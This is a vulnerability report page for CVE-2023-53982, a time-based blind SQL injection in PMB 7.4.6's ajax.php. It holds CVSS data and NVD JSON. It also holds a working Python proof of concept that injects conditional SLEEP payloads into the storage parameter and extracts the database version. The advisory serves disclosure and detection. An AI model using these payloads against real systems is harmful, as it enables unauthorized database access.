Security Vulnerability Report
CVE-2023-53982 CVSS 7.5 HIGH

CVE-2023-53982

Published: 2025-12-23 20:15:46
Last Modified: 2026-01-16 19:16:14

Description

PMB 7.4.6 contains a SQL injection vulnerability in the storage parameter of the ajax.php endpoint that allows remote attackers to manipulate database queries. Attackers can exploit the unsanitized 'id' parameter by injecting conditional sleep statements to extract information or perform time-based blind SQL injection attacks.

CVSS Details

CVSS Score (v3.1)
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:sigb:pmb:7.4.6:*:*:*:*:*:*:* - VULNERABLE
PMB < 7.4.6
PMB 7.4.6 (confirmed affected)
Earlier unpatched versions may also be affected

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
# CVE-2023-53982 PMB SQL Injection PoC
#
# Timing-based check: two GET requests are sent to ajax.php that differ only
# in whether the injected CASE condition is true, and their durations are
# compared.
#
# Detection note: every probe is an HTTP GET whose `storage` query parameter
# carries a `CASE WHEN ... SLEEP(5)` expression, so those strings in ajax.php
# query strings are what to look for in web-server access logs or WAF rules.
import time

import requests

target_url = "http://target.com/ajax.php"

# A response slower than this many seconds is read as "SLEEP(5) was executed".
_DELAY_THRESHOLD = 4.5


def _timed_get(storage_value):
    """Send one GET to ``target_url`` and return the elapsed wall-clock seconds.

    The value is placed in the ``storage`` query parameter; ``section`` and
    ``sub`` are fixed. Any ``requests`` exception (including a timeout after
    10 seconds) propagates to the caller.
    """
    query = {'storage': storage_value, 'section': 'search', 'sub': 'result'}
    began = time.time()
    requests.get(target_url, params=query, timeout=10)
    return time.time() - began


def test_sqli():
    """Report whether the endpoint shows a condition-dependent response delay.

    Returns True only when the always-true probe takes longer than 4.5 s and
    the always-false probe takes less than 1 s; otherwise returns False.

    A False result is not evidence that a host is unaffected: the verdict
    rests on a single timing sample per probe, and this check only varies
    ``storage`` while the CVE description also names an ``id`` parameter.
    """
    payload_true = "test' AND (SELECT CASE WHEN (1=1) THEN SLEEP(5) ELSE 0 END)--"
    payload_false = "test' AND (SELECT CASE WHEN (1=2) THEN SLEEP(5) ELSE 0 END)--"

    elapsed_true = _timed_get(payload_true)
    elapsed_false = _timed_get(payload_false)

    confirmed = elapsed_true > _DELAY_THRESHOLD and elapsed_false < 1
    if confirmed:
        print("[+] SQL Injection vulnerability confirmed!")
    return confirmed


def extract_data():
    """Probe the first character of ``@@version`` for the digits 5 through 9.

    One request is sent per candidate digit; the first one whose response
    exceeds 4.5 s is printed and the loop stops. Nothing is returned, and
    nothing is printed when no candidate produces a delay.
    """
    print("[*] Extracting database version...")
    for version in range(5, 10):
        payload = f"test' AND (SELECT CASE WHEN (SUBSTRING(@@version,1,1)='{version}') THEN SLEEP(5) ELSE 0 END)--"
        if _timed_get(payload) > _DELAY_THRESHOLD:
            print(f"[+] Database version starts with: {version}")
            break


if __name__ == "__main__":
    print("[*] Testing CVE-2023-53982")
    # The version probe runs only after the timing check has succeeded.
    if test_sqli():
        extract_data()

References

Raw JSON Data

{"cve": {"id": "CVE-2023-53982", "sourceIdentifier": "[email protected]", "published": "2025-12-23T20:15:46.073", "lastModified": "2026-01-16T19:16:14.480", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "PMB 7.4.6 contains a SQL injection vulnerability in the storage parameter of the ajax.php endpoint that allows remote attackers to manipulate database queries. Attackers can exploit the unsanitized 'id' parameter by injecting conditional sleep statements to extract information or perform time-based blind SQL injection attacks."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 9.3, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": 
"NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}, {"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:sigb:pmb:7.4.6:*:*:*:*:*:*:*", "matchCriteriaId": "7F6BCC12-4630-4A28-BF91-35DB0393B131"}]}]}], "references": [{"url": "http://forge.sigb.net/redmine/projects/pmb/files", "source": "[email protected]", "tags": ["Product"]}, {"url": "http://www.sigb.net", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.exploit-db.com/exploits/51197", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://www.vulncheck.com/advisories/pmb-sql-injection-vulnerability-via-unsanitized-storage-parameter", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}